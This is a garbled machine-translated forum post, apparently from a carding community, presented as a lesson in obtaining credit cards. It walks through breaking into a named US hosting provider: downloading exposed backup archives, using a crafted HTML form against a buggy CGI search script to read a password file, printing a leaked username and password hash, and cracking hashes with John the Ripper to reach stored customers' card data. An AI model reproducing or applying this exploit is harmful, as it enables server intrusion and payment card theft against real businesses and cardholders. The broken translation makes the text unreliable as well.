Le cycle de cours sur une carte de crédit

Nous continuons notre série de cours pour obtenir des cartes de crédit.

ssl.adgrafix.com des ressources est un dépôt de centaines de petits magasins en ligne américains.
Passez devant ce fait était pas. Plus que je trouve sur ce script de recherche de buggy serveur qui vous permet de visualiser tous les fichiers sur le serveur avec les privilèges du serveur. A propos de la vulnérabilité de détails regarder ici: http://www.lwb57.org/advisories/?adv=12

Mais mon but était un meilleur accès aux yuzersky cartes de crédit hranilitsam.
Incite la base de samopisnaya serveur DCS, après un certain temps , je vis que le répertoire / utilisateurs / ouverts pour voir, il y avait des utilisateurs dossier naturellement soumis à autorisation.
Mais à part ça, il a immédiatement jeter les dossiers de plusieurs archives de sauvegarde soient disponibles en téléchargement:
http://ssl.adgrafix.com/users/cedarsinn-secure.tar
http://ssl.adgrafix.com/users/diamonds-secure.tar
http://ssl.adgrafix.com/users/heavymetal-secure.tar
etc.

Leur contenu n'a été trouvé carte de crédit, mais le plus gros était de trouver le fichier .htaccess comme suit:

AuthUserFile / opt / home2 / adgrafix / securedir / heavymetalpw
AuthGroupFile / dev / null
AuthName "Secure System Data Retrieval"
AuthType Basic

<Limit GET POST>

exiger utilisateur heavymetal
</ Limit>

Attention , immédiatement attiré le fichier avec un heavymetalpw de mot de passe, et plus important encore , il a été établi le chemin devant lui. Il est resté dans l'exploit d'ajouter ce chemin, et je me suis le mot de passe de l'utilisateur:

<Form method = action POST = " http://ssl.adgrafix.com/cgi-bin/wsmsearch2.cgi">
<B> <FONT FACE = " Arial, Helvetica"> <font size = -1> Rechercher sur le site: </ FONT> </ FONT> <br> </ B>
<Input type = text name = " la taille des termes" = 20>
<Input type = hidden name = booléen value = "ET">
<Input type = hidden name = cas value = "Insensitive">
<Input type = hidden name = quicksearch value = "NO">
<Input type = hidden name = max value = " 50">
<Input type = hidden name = faqfile value = "/">
<Input type = name = RésultatsPage caché value = "/ opt / home2 / adgrafix / securedir / heavymetalpw">
<Input type = soumettre value = " Rechercher!">


Vous appelez ce script à partir d' un domaine qui ne soit pas inscrit sur Adgrafix
Content - type: text / html heavymetal : bcroman .vGqzyBep5EDE: 1b8HaV7PCqZc.

D' ailleurs , j'avais déjà une liste d'utilisateurs de cette ressource, obtenue avec le même script,
qui était juste assez pour entrer le nom d'un utilisateur existant:
http://ssl.adgrafix.com/ssl_adgrafix_user_list.txt

Bien sûr , il serait possible de prendre les connexions des utilisateurs du dossier / utilisateurs /, mais si le moteur de recherche était très gentil et m'a donné immédiatement une liste de noms d'utilisateurs, je décide de ne pas fatiguer.

Deux heures plus tard , je réunis tous les logins / mots de passe et l' a nourri john'u, et en trois jours je l' ai déjà eu accès au crédit de stockage demi-yuzerkih.


Votre bug Durito.
_________________
MANGER LES RICHES!